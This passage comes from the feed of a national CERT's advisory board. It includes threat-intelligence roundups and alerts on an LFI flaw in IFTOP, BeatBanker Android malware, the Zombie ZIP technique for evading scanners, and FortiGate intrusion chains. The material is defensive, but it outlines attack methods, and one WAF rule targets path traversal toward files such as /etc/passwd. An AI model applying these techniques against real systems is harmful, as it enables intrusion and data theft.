"Wireless vulnerabilities are being disclosed at a rate that has no precedent in the fifteen-year history of systematic tracking. In 2025, researchers published 937 new wireless-related CVEs, an average of 2.5 per day, according to a threat report from Bastille Networks based on data from the NIST National Vulnerability Database. The wireless CVE category has expanded from 4 disclosures in 2010 to 932 in 2025, a 230× increase. When indexed against the same 2010 baseline, wireless disclosures have grown at more than 20 times the rate of total CVE disclosures across all technology categories. Wireless CVEs now account for nearly 2% of all annual disclosures."<br />
<a href="https://www.helpnetsecurity.com/2026/03/12/report-wireless-security-vulnerabilities-2026/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/12/report-wireless-security-vulnerabilities-2026/</a></li>
<li><strong>The Human IOC: Why Security Professionals Struggle With Social Vetting</strong><br />
"During my years working in Security Operations, we were very careful to vet anything that came our way. We vetted sources, intelligence, IOCs, TTPs (tactics, techniques, and procedures), and other information as well. The reason for this was straightforward. Leveraging anything that was not properly vetted could result in serious consequences."<br />
<a href="https://www.securityweek.com/the-human-ioc-why-security-professionals-struggle-with-social-vetting/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/the-human-ioc-why-security-professionals-struggle-with-social-vetting/</a></li>
<li><strong>US Sanctions North Korea IT Worker Networks In Laos, Vietnam</strong><br />
"The U.S. Treasury Department sanctioned six people and two companies for their work supporting the North Korean IT worker scheme in multiple countries. The latest round of sanctions targeted Amnokgang Technology Development Company — a North Korean company that manages delegations of IT workers — and Quangvietdnbg International Services Company — a Vietnamese firm used by North Korean actors for currency conversion services. The Treasury Department said Quangvietdnbg converted about $2.5 million for Amnokgang between 2023 and 2025."<br />
<a href="https://therecord.media/us-sanctions-north-korea-it-worker-networks-laos-vietnam" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/us-sanctions-north-korea-it-worker-networks-laos-vietnam</a></li>
<li><strong>Navigating 2026’s Converged Threats: Insights From Flashpoint’s Global Threat Intelligence Report</strong><br />
"The cybersecurity landscape has reached a point of total convergence, where the silos that once separated malware, identity, and infrastructure have collapsed into a single, high-velocity threat engine. Simultaneously, the threat landscape is shifting from human-led attacks to machine-speed operations as a result of agentic AI, which acts as a force multiplier for the modern adversary."<br />
<a href="https://flashpoint.io/blog/global-threat-intelligence-report-2026/" target="_blank" rel="noopener noreferrer nofollow ugc">https://flashpoint.io/blog/global-threat-intelligence-report-2026/</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/12/agentic-attack-chains-infostealers-criminal-markets/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/12/agentic-attack-chains-infostealers-criminal-markets/</a></li>
<li><strong>Proactive Preparation And Hardening Against Destructive Attacks: 2026 Edition</strong><br />
"Threat actors leverage destructive malware to destroy data, eliminate evidence of malicious activity, or manipulate systems in a way that renders them inoperable. Destructive cyberattacks can be a powerful means to achieve strategic or tactical objectives; however, the risk of reprisal is likely to limit the frequency of use to very select incidents. Destructive cyberattacks can include destructive malware, wipers, or modified ransomware."<br />
<a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks" target="_blank" rel="noopener noreferrer nofollow ugc">https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks</a></li>
<li><strong>Cyber Fallout From The Iran War: What To Have On Your Radar</strong><br />
"The war in Iran was less than 24 hours old when it produced a historic first: the deliberate targeting of commercial data centers. On March 1st, Iranian drones hit three Amazon Web Services (AWS) facilities in the United Arab Emirates and Bahrain, disrupting core cloud infrastructure and knocking out finance apps and enterprise tools not only across the Gulf, but also far away from the region. The attacks showed that physical distance from a conflict zone is no guarantee of insulation from the impacts of kinetic warfare."<br />
<a href="https://www.welivesecurity.com/en/business-security/cyber-fallout-iran-war-what-have-radar/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.welivesecurity.com/en/business-security/cyber-fallout-iran-war-what-have-radar/</a></li>
</ul>
<p dir="auto"><strong>References</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1773392568550-59399cda-7d8d-4c06-8f3e-d45c8db89054-image.png" alt="59399cda-7d8d-4c06-8f3e-d45c8db89054-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2697/cyber-threat-intelligence-13-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2697/cyber-threat-intelligence-13-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Fri, 13 Mar 2026 09:02:49 GMT</pubDate></item><item><title><![CDATA[🚨Urgent! Alert: critical vulnerability in the IFTOP warehouse management software by WellChoose]]></title><description><![CDATA[<p dir="auto">The National Computer Security Coordination Center (ThaiCERT) has been monitoring a security vulnerability found in WellChoose's warehouse management software. Administrators who run this software should inspect their systems and apply the patch or protective measures immediately, to prevent attacks, unauthorized access to the system, and leakage of sensitive data held in it [1]</p>
<p dir="auto">1. Vulnerability details<br />
A Local File Inclusion (LFI) vulnerability, CVE-2026-3826 (CVSS v3.1: 9.8), was found in the PHP Include/Require functionality of WellChoose's IFTOP (Inventory &amp; Task Optimization Platform) warehouse management software. It may allow an unauthenticated remote attacker to access files on the system, run malicious code, or reach sensitive data inside the warehouse system [2]</p>
<p dir="auto">2. Attack characteristics<br />
The flaw stems from the system's lack of filename validation (CWE-98), which lets an attacker inject file paths (Path Traversal) to read sensitive files on the system, or trick the server into running malicious code from an external source (Remote Code Execution) [3]</p>
<p dir="auto">3. Affected products</p>
<ul>
<li>IFTOP (Inventory &amp; Task Optimization Platform)</li>
</ul>
<p dir="auto">4. Remediation guidance for administrators of WellChoose warehouse systems [4]<br />
4.1 Apply the patch urgently by updating to the latest version in which the vulnerability has been fixed<br />
4.2 Check the php.ini file and set allow_url_include = Off to reduce the risk of remote attack<br />
4.3 Restrict file permissions so that the web server can access only the directories it needs<br />
4.4 Isolate the server running IFTOP from the public internet, and allow access only through a VPN or a system that requires multi-factor authentication (MFA)</p>
<ol start="5">
<li>If updating is not yet possible, take the following steps<br />
5.1  Use a Web Application Firewall (WAF) to detect and block request parameters containing ../ or system file names (such as /etc/passwd)<br />
5.2  Restrict access to the Management Interface to an allow list of IP addresses used by warehouse staff only<br />
5.3  Regularly review web server logs for abnormal file-access attempts</li>
</ol>
<p dir="auto"><img src="https://webboard-nsoc.ncsa.or.th/assets/plugins/nodebb-plugin-emoji/emoji/android/1f4e2.png?v=3db0bp1b09r" class="not-responsive emoji emoji-android emoji--loudspeaker" style="height:23px;width:auto;vertical-align:middle" title=":loudspeaker:" alt="📢" /> ThaiCERT warns: do not let a vulnerability in your warehouse system become the path to a shutdown of operations!</p>
<p dir="auto">#CyberSecurity #CVE20263826 #IFTOP #WellChoose #WarehouseManagement #SmartLogistics #ThaiCERT #Alert #LFI #VulnerabilityManagement #ความปลอดภัยทางไซเบอร์ #ระบบคลังสินค้า</p>
<p dir="auto">References<br />
[1] <a href="https://radar.offseq.com/threat/cve-2026-3826-cwe-98-improper-control-of-filename--e68c5a28" target="_blank" rel="noopener noreferrer nofollow ugc">https://radar.offseq.com/threat/cve-2026-3826-cwe-98-improper-control-of-filename--e68c5a28</a><br />
[2] <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3826" target="_blank" rel="noopener noreferrer nofollow ugc">https://nvd.nist.gov/vuln/detail/CVE-2026-3826</a><br />
[3] <a href="https://www.twcert.org.tw/en/cp-139-10756-73f66-2.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.twcert.org.tw/en/cp-139-10756-73f66-2.html</a><br />
[4] <a href="https://cwe.mitre.org/data/definitions/98.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://cwe.mitre.org/data/definitions/98.html</a></p>
<p dir="auto"><img src="/assets/uploads/files/1773386296850-iftop-v2-resized.png" alt="IFTOP V2.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2696/ด-วน-แจ-งเต-อนช-องโหว-ระด-บว-กฤตในซอฟต-แวร-บร-หารจ-ดการคล-งส-นค-า-iftop-โดย-wellchoose</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2696/ด-วน-แจ-งเต-อนช-องโหว-ระด-บว-กฤตในซอฟต-แวร-บร-หารจ-ดการคล-งส-นค-า-iftop-โดย-wellchoose</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Fri, 13 Mar 2026 07:18:20 GMT</pubDate></item><item><title><![CDATA[Warning for Android users! "BeatBanker" malware found disguised as a Starlink application]]></title><description><![CDATA[<p dir="auto">The National Computer Security Coordination Center (ThaiCERT) is warning Android users to take care when downloading and installing applications,<br />
as a new malware strain named "BeatBanker" has been detected spreading by impersonating the Starlink satellite internet application.<br />
It usually arrives through web advertisements, links in SMS messages, or LINE groups that urge the user to download oddly named files (ending in .apk) from outside the Play Store[1]</p>
<p dir="auto">1. Attack pattern and characteristics (Attack Vector)<br />
The malware is a hybrid threat with the following behaviour<br />
1.1 It intercepts login credentials for mobile banking applications and reads one-time passwords (OTP) from SMS messages in order to carry out fraudulent financial transactions<br />
1.2 It can drive the device's processor (CPU) at full load to mine cryptocurrency, causing the device to overheat, perform poorly, and suffer premature battery degradation</p>
<p dir="auto">2. Warning signs that a device may be infected include<br />
2.1 The device runs hotter than normal for extended periods, even when it is not under heavy use<br />
2.2 The battery drains unusually fast (Battery Drain)<br />
2.3 The operating system is sluggish, freezes, or applications crash frequently<br />
2.4 Unfamiliar applications appear, or pop-ups repeatedly request permissions for no apparent reason</p>
<p dir="auto">3. Response measures (Incident Response)<br />
3.1 Disconnect from the network: turn off Wi-Fi and mobile data immediately to stop communication with the attacker's servers<br />
3.2 Uninstall the application: inspect and remove suspicious applications (if they cannot be removed normally, do so from Safe Mode)<br />
3.3 Contact your bank immediately to review account activity, and consider freezing the account or changing passwords if necessary<br />
3.4 Notify your organization's system administrator (if the device is used for work) to prevent the infection from spreading into the organization's network</p>
<p dir="auto">4. Preventive practices[2]<br />
4.1 Install applications only from trusted sources: download through the Google Play Store only, and avoid installing .apk files from external sources or forwarded links<br />
4.2 Check accessibility permissions (Accessibility Service) under Settings &gt; Accessibility; if an unfamiliar application has been granted access, revoke it and uninstall the application immediately<br />
4.3 Enable Google Play Protect so that the system automatically scans for malicious applications<br />
4.4 Keep the operating system and applications updated to the latest versions to close security vulnerabilities</p>
<p dir="auto"><img src="https://webboard-nsoc.ncsa.or.th/assets/plugins/nodebb-plugin-emoji/emoji/android/1f4cc.png?v=3db0bp1b09r" class="not-responsive emoji emoji-android emoji--pushpin" style="height:23px;width:auto;vertical-align:middle" title=":pushpin:" alt="📌" /> Users are urged to check their device usage and install applications only from trusted sources, to reduce the risk of cyber threats</p>
<p dir="auto">References<br />
[1]<a href="https://dg.th/wp6fz4ned2" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/wp6fz4ned2</a><br />
[2]<a href="https://dg.th/a4rdb0w28m" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/a4rdb0w28m</a></p>
<p dir="auto">#ThaiCERT #CyberSecurity #แจ้งเตือนภัยไซเบอร์ #มัลแวร์อันตราย #BeatBanker #StarlinkApp #เตือนภัยแอปปลอม #AndroidSafety #CyberSafety</p>
<p dir="auto"><img src="/assets/uploads/files/1773384472982-beatbanker-v2-resized.png" alt="BeatBanker V2.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2695/เต-อนภ-ยผ-ใช-android-พบม-ลแวร-beatbanker-แฝงต-วในแอปพล-เคช-น-starlink</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2695/เต-อนภ-ยผ-ใช-android-พบม-ลแวร-beatbanker-แฝงต-วในแอปพล-เคช-น-starlink</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Fri, 13 Mar 2026 06:47:55 GMT</pubDate></item><item><title><![CDATA[Warning! Zombie ZIP, a new technique that prevents Antivirus and EDR from detecting malware in ZIP files; administrators should review and improve their compressed-file inspection measures urgently]]></title><description><![CDATA[<p dir="auto">The National Computer Security Coordination Center (ThaiCERT) has been monitoring a security issue involving a new technique called "Zombie ZIP", which can be used to hide a payload inside a specially crafted ZIP file in order to evade detection by security systems such as Antivirus programs and Endpoint Detection and Response (EDR) systems</p>
<ol>
<li>Technique details</li>
</ol>
<p dir="auto">Security researchers at Bombadil Systems have published a new technique called "Zombie ZIP", which manipulates the structure of a ZIP file so that the information in the header does not match the actual data inside the file. For example, the Compression Method is set to STORED (0), meaning the data is not compressed, while the actual data has been compressed with the DEFLATE algorithm. As a result, Antivirus or Endpoint Detection and Response (EDR) systems that rely on the header when processing the file scan the raw bytes without decompressing them first, and so may fail to detect the payload hidden inside the file [1]</p>
<p dir="auto">The technique has been assigned CVE-2026-0866, and the CERT Coordination Center has published a vulnerability note on it under VU#976247 [2]</p>
<p dir="auto">The vulnerability resembles CVE-2004-0935 (VU#968818), which concerned the use of malformed ZIP files to evade Antivirus detection by exploiting the fact that the scanning system trusted the metadata inside the archive too much and therefore could not correctly analyze the file's actual contents [3]</p>
<ol start="2">
<li>Technical mechanism of Zombie ZIP</li>
</ol>
<p dir="auto">Testing by the researchers on the VirusTotal platform found that files built with the Zombie ZIP technique evade antivirus detection at a high rate. When the same payload was packaged in a normal ZIP file, it was detected by more than 50 malware detection engines, but after the header was altered into a Zombie ZIP it was detected by only 1 of the more than 50 engines. Common extraction tools such as 7-Zip or WinRAR typically report an error or cannot fully extract the file, because the compression method and CRC values do not match the actual data inside the file [4]</p>
<ol start="3">
<li>Antivirus programs affected by the Zombie ZIP technique</li>
</ol>
<p dir="auto">3.1 Microsoft (Microsoft Defender)<br />
3.2 Avast<br />
3.3 Bitdefender<br />
3.4 ESET<br />
3.5 Kaspersky<br />
3.6 McAfee<br />
3.7 Sophos<br />
3.8 Trend Micro</p>
<ol start="4">
<li>Remediation guidance</li>
</ol>
<p dir="auto">4.1 Check the compression method in the ZIP header against the characteristics of the actual data<br />
4.2 Add mechanisms to detect anomalies in the structure of compressed files<br />
4.3 Use a Deep Archive Inspection mode to detect malware hidden inside compressed files<br />
4.4 Do not rely solely on the metadata in the file<br />
4.5 Add heuristic detection for malformed archives<br />
4.6 Update Antivirus and EDR to the latest versions and follow the guidance of security product vendors</p>
<ol start="5">
<li>Additional security recommendations</li>
</ol>
<p dir="auto">5.1 Avoid opening compressed files from untrusted sources<br />
5.2 Block or quarantine archive files with an abnormal structure<br />
5.3 Monitor for files that produce errors on extraction, such as unsupported method<br />
5.4 Monitor the behaviour of programs that attempt to decompress archives programmatically<br />
5.5 Use a sandbox or malware analysis system before opening files</p>
<ol start="6">
<li>References</li>
</ol>
<p dir="auto">[1] <a href="https://dg.th/20agl4ntwq" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/20agl4ntwq</a><br />
[2] <a href="https://dg.th/0yopcv84xb" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/0yopcv84xb</a><br />
[3] <a href="https://dg.th/5vfbj3ypwm" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/5vfbj3ypwm</a><br />
[4] <a href="https://dg.th/k9z3muvrg7" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/k9z3muvrg7</a></p>
<p dir="auto"><img src="/assets/uploads/files/1773384426072-zombie-zip-resized.png" alt="Zombie ZIP.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2694/เต-อนภ-ย-zombie-zip-เทคน-คร-ปแบบใหม-ท-ส-งผลให-antivirus-และ-edr-ตรวจจ-บม-ลแวร-ในไฟล-zip-ไม-ได-ผ-ด-แลระบบควรตรวจสอบและปร-บปร-งมาตรการตรวจสอบไฟล-บ-บอ-ดโดยด-วน</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2694/เต-อนภ-ย-zombie-zip-เทคน-คร-ปแบบใหม-ท-ส-งผลให-antivirus-และ-edr-ตรวจจ-บม-ลแวร-ในไฟล-zip-ไม-ได-ผ-ด-แลระบบควรตรวจสอบและปร-บปร-งมาตรการตรวจสอบไฟล-บ-บอ-ดโดยด-วน</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Fri, 13 Mar 2026 06:47:09 GMT</pubDate></item><item><title><![CDATA[Alert: FortiGate device vulnerabilities are being targeted to breach networks and steal sensitive data]]></title><description><![CDATA[<p dir="auto">The National Computer Security Coordination Center (ThaiCERT) has been monitoring the cyber security situation and has found reports of an attack campaign targeting FortiGate Next-Generation Firewall (NGFW) devices, which are used as a covert entry point into organizations' internal networks [1]<br />
According to a report by SentinelOne, the sectors currently being targeted most are healthcare, government agencies, and Managed Service Providers (MSPs) [2]</p>
<ol>
<li>
<p dir="auto">Nature and behaviour of the attacks<br />
The attackers exploit recently disclosed critical security vulnerabilities, as well as easily guessed account credentials, to break into FortiGate devices. The vulnerabilities involved are as follows:<br />
•	CVE-2025-59718 (CVSS V3.1:9.8) [3]<br />
•	CVE-2025-59719 (CVSS V3.1:9.8) [4] [5]<br />
•	CVE-2026-24858 (CVSS V3.1:9.8) [6] [7]<br />
The primary objective is to retrieve configuration files, which store the service account credentials used to connect to Active Directory (AD) and Lightweight Directory Access Protocol (LDAP)<br />
Once the attackers obtain this information, they can gain further access as follows:<br />
1.1 Create a new local administrator account with a misleading name such as "support", to serve as an unrestricted entry point into the system<br />
1.2 Operate as an Initial Access Broker (IAB), maintaining their foothold in the system and monetizing the access<br />
1.3 Install remote control tools (such as Pulseway or MeshAgent) to steal the system's critical database (NTDS.dit) and Registry Hives and exfiltrate them to external servers</p>
</li>
<li>
<p dir="auto">Guidance for response and prevention<br />
2.1 Thoroughly review the configuration of FortiGate devices in your environment, especially administrator accounts that may have been created without a known reason, and firewall policies that grant unusual cross-zone access<br />
2.2 Update the device's operating system, firmware, and security patches to the latest versions immediately, to close vulnerabilities that may be used as an attack vector<br />
2.3 Closely monitor event logs, including AD logins, network scanning, connections to suspicious external IP addresses (for example over port 443), and the installation of unauthorized remote access software<br />
2.4 Change the passwords of all service accounts immediately if a device in the network has been vulnerable, or if there is any indication that configuration files may have been exfiltrated<br />
2.5 Restrict access to the device's Management Interface by disabling access from the public internet (WAN) and allowing only the IP addresses of trusted administrators (initial workaround)<br />
2.6 Temporarily disable features related to the vulnerabilities (workaround), such as turning off FortiCloud SSO, if the organization cannot apply the security patches immediately, in order to reduce the risk of unauthorized access<br />
A firewall is the first line of defence of a network; managing risk and closing vulnerabilities promptly helps prevent damage that could affect the organization at a structural level</p>
</li>
</ol>
<p dir="auto">References<br />
[1] <a href="https://dg.th/uvjklgarb1" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/uvjklgarb1</a><br />
[2] <a href="https://dg.th/0bi79ackmv" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/0bi79ackmv</a><br />
[3] <a href="https://dg.th/skdrzw9mav" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/skdrzw9mav</a><br />
[4] <a href="https://dg.th/vnecb1rtha" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/vnecb1rtha</a><br />
[5] <a href="https://dg.th/drpaf341u8" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/drpaf341u8</a><br />
[6] <a href="https://dg.th/jqzaf06vbg" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/jqzaf06vbg</a><br />
[7] <a href="https://dg.th/w2cxrbvk68" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/w2cxrbvk68</a></p>
<p dir="auto">#CyberSecurity #FortiGate #InfoSec #CyberThreat #NetworkSecurity #Vulnerability #CyberOperations #การรักษาความมั่นคงปลอดภัยทางไซเบอร์</p>
<p dir="auto"><img src="/assets/uploads/files/1773384344223-%E0%B8%8A-%E0%B8%AD%E0%B8%87%E0%B9%82%E0%B8%AB%E0%B8%A7-%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%AD-%E0%B8%9B%E0%B8%81%E0%B8%A3%E0%B8%93-fortigate-v3-resized.png" alt="ช่องโหว่ของอุปกรณ์ FortiGate v3.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2693/เต-อนภ-ยช-องโหว-ของอ-ปกรณ-fortigate-กำล-งตกเป-นเป-าหมายในการเจาะเคร-อข-ายและขโมยข-อม-ลสำค-ญ</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2693/เต-อนภ-ยช-องโหว-ของอ-ปกรณ-fortigate-กำล-งตกเป-นเป-าหมายในการเจาะเคร-อข-ายและขโมยข-อม-ลสำค-ญ</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Fri, 13 Mar 2026 06:45:46 GMT</pubDate></item><item><title><![CDATA[CISA adds 1 known exploited vulnerability to its catalog]]></title><description><![CDATA[<p dir="auto">On 11 March 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added 1 new vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation, as follows</p>
<ul>
<li>CVE-2025-68613 n8n Improper Control of Dynamically-Managed Code Resources Vulnerability</li>
</ul>
<p dir="auto">CISA will continue to update and add new vulnerabilities to the KEV catalog so that it covers the risks actually observed now and in the future</p>
<p dir="auto"><strong>References</strong><br />
<a href="https://www.cisa.gov/news-events/alerts/2026/03/11/cisa-adds-one-known-exploited-vulnerability-catalog" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/alerts/2026/03/11/cisa-adds-one-known-exploited-vulnerability-catalog</a><br />
Follow further news on the webboard or on Facebook NCSA Thailand <img src="/assets/uploads/files/1773310228092-767c906c-6c56-4350-b600-ca241df61440-image.png" alt="767c906c-6c56-4350-b600-ca241df61440-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2692/cisa-เพ-มช-องโหว-ท-ถ-กใช-โจมต-1-รายการลงในแคตตาล-อก</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2692/cisa-เพ-มช-องโหว-ท-ถ-กใช-โจมต-1-รายการลงในแคตตาล-อก</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 10:10:34 GMT</pubDate></item><item><title><![CDATA[Cyber Threat Intelligence 12 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Industrial Sector</strong></p>
<ul>
<li><strong>Apeman Cameras</strong><br />
"Successful exploitation of these vulnerabilities could allow an attacker to take control of the device or view camera feeds."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-01" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-01</a></li>
<li><strong>Lantronix EDS3000PS And EDS5000</strong><br />
"Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and execute code with root-level privileges."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-02" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-02</a></li>
<li><strong>Honeywell IQ4x BMS Controller</strong><br />
"Successful exploitation of this vulnerability could allow an unauthorized attacker to access controller management settings, control components, disclose information, or cause a denial-of-service condition."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-03" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-03</a></li>
<li><strong>ICS Patch Tuesday: Vulnerabilities Fixed By Siemens, Schneider, Moxa, Mitsubishi Electric</strong><br />
"Industrial giants Siemens, Schneider Electric, Mitsubishi Electric, and Moxa have published new Patch Tuesday advisories for vulnerabilities found recently in their ICS products. Siemens and Schneider Electric have each published six new advisories. Each of Schneider’s new advisories addresses one vulnerability. The company has informed customers about high-severity issues in EcoStruxure IT Data Center Expert (hardcoded credentials), EcoStruxure Power Monitoring Expert and Power Operation (local arbitrary code execution), and EcoStruxure Automation Expert (command execution and full system compromise)."<br />
<a href="https://www.securityweek.com/ics-patch-tuesday-vulnerabilities-fixed-by-siemens-schneider-moxa-mitsubishi-electric/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/ics-patch-tuesday-vulnerabilities-fixed-by-siemens-schneider-moxa-mitsubishi-electric/</a></li>
<li><strong>Ceragon Siklu MultiHaul And EtherHaul Series</strong><br />
"Successful exploitation of this vulnerability could result in arbitrary file upload to the target equipment."<br />
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-04" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/ics-advisories/icsa-26-069-04</a></li>
</ul>
<p dir="auto"><strong>New Tooling</strong></p>
<ul>
<li><strong>Cloud-Audit: Fast, Open-Source AWS Security Scanner</strong><br />
"Running AWS security audits without a dedicated security team typically means choosing between enterprise platforms with per-check billing and generic open-source scanners that produce findings with no remediation guidance. Cloud-audit, a Python CLI tool published on GitHub by Mariusz Gebala, takes a narrower scope and attaches a fix to every finding it generates."<br />
<a href="https://www.helpnetsecurity.com/2026/03/11/cloud-audit-open-source-aws-security-scanner/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/11/cloud-audit-open-source-aws-security-scanner/</a><br />
<a href="https://github.com/gebalamariusz/cloud-audit" target="_blank" rel="noopener noreferrer nofollow ugc">https://github.com/gebalamariusz/cloud-audit</a></li>
</ul>
<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>Fortinet, Ivanti, Intel Patch High-Severity Vulnerabilities</strong><br />
"Fortinet, Ivanti, and Intel on Tuesday rolled out security fixes for dozens of vulnerabilities, including high-severity bugs that could be exploited for arbitrary code execution, privilege escalation, or security protection bypasses. Fortinet announced patches for 22 security defects across its products, including high-severity flaws in FortiWeb, FortiSwitchAXFixed, FortiManager, and FortiClientLinux. The FortiWeb, FortiSwitchAXFixed, and FortiManager issues could be exploited by remote, unauthenticated attackers to bypass the authentication rate limit or execute unauthorized code or commands."<br />
<a href="https://www.securityweek.com/fortinet-ivanti-intel-patch-high-severity-vulnerabilities/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/fortinet-ivanti-intel-patch-high-severity-vulnerabilities/</a></li>
<li><strong>Zero Click Unauthenticated RCE In n8n: A Contact Form That Executes Shell Commands</strong><br />
"Pillar Research team found a zero-click, unauthenticated RCE in n8n. Anyone who can reach a public multi-step form with an HTML rendering can execute shell commands on the server. We worked with the n8n team to fix it. If you use n8n Cloud, you're already protected. If you're self-hosting, update to 2.10.1 / 2.9.3 / 1.123.22 now. This is CVE-2026-27493: an unauthenticated, zero-click RCE affecting every n8n instance that exposes a multi-step form with an HTML rendering step that displays user input back to the submitter. We scanned for publicly accessible n8n form endpoints and identified over 50,000 potentially vulnerable forms exposed to the internet. The attack requires nothing more than a browser."<br />
<a href="https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.pillar.security/blog/zero-click-unauthenticated-rce-in-n8n-a-contact-form-that-executes-shell-commands</a><br />
<a href="https://thehackernews.com/2026/03/critical-n8n-flaws-allow-remote-code.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/critical-n8n-flaws-allow-remote-code.html</a></li>
<li><strong>CISA Adds One Known Exploited Vulnerability To Catalog</strong><br />
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.<br />
CVE-2025-68613 n8n Improper Control of Dynamically-Managed Code Resources Vulnerability"<br />
<a href="https://www.cisa.gov/news-events/alerts/2026/03/11/cisa-adds-one-known-exploited-vulnerability-catalog" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.cisa.gov/news-events/alerts/2026/03/11/cisa-adds-one-known-exploited-vulnerability-catalog</a><br />
<a href="https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-n8n-rce-flaw-exploited-in-attacks/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-n8n-rce-flaw-exploited-in-attacks/</a></li>
<li><strong>400,000 WordPress Sites Affected By Unauthenticated SQL Injection Vulnerability In Ally WordPress Plugin</strong><br />
"On February 4th, 2026, we received a submission for an SQL Injection vulnerability in Ally, a WordPress plugin estimated to have more than 400,000 active installations. This vulnerability can be leveraged to extract sensitive data from the database, such as password hashes. Props to Drew Webber (mcdruid) who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This vulnerability was reported to our program just five days after it was introduced. This researcher earned a bounty of $800.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program."<br />
<a href="https://www.wordfence.com/blog/2026/03/400000-wordpress-sites-affected-by-unauthenticated-sql-injection-vulnerability-in-ally-wordpress-plugin/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.wordfence.com/blog/2026/03/400000-wordpress-sites-affected-by-unauthenticated-sql-injection-vulnerability-in-ally-wordpress-plugin/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/sqli-flaw-in-elementor-ally-plugin-impacts-250k-plus-wordpress-sites/</a></li>
<li><strong>DirectX, OpenFOAM, Libbiosig Vulnerabilities</strong><br />
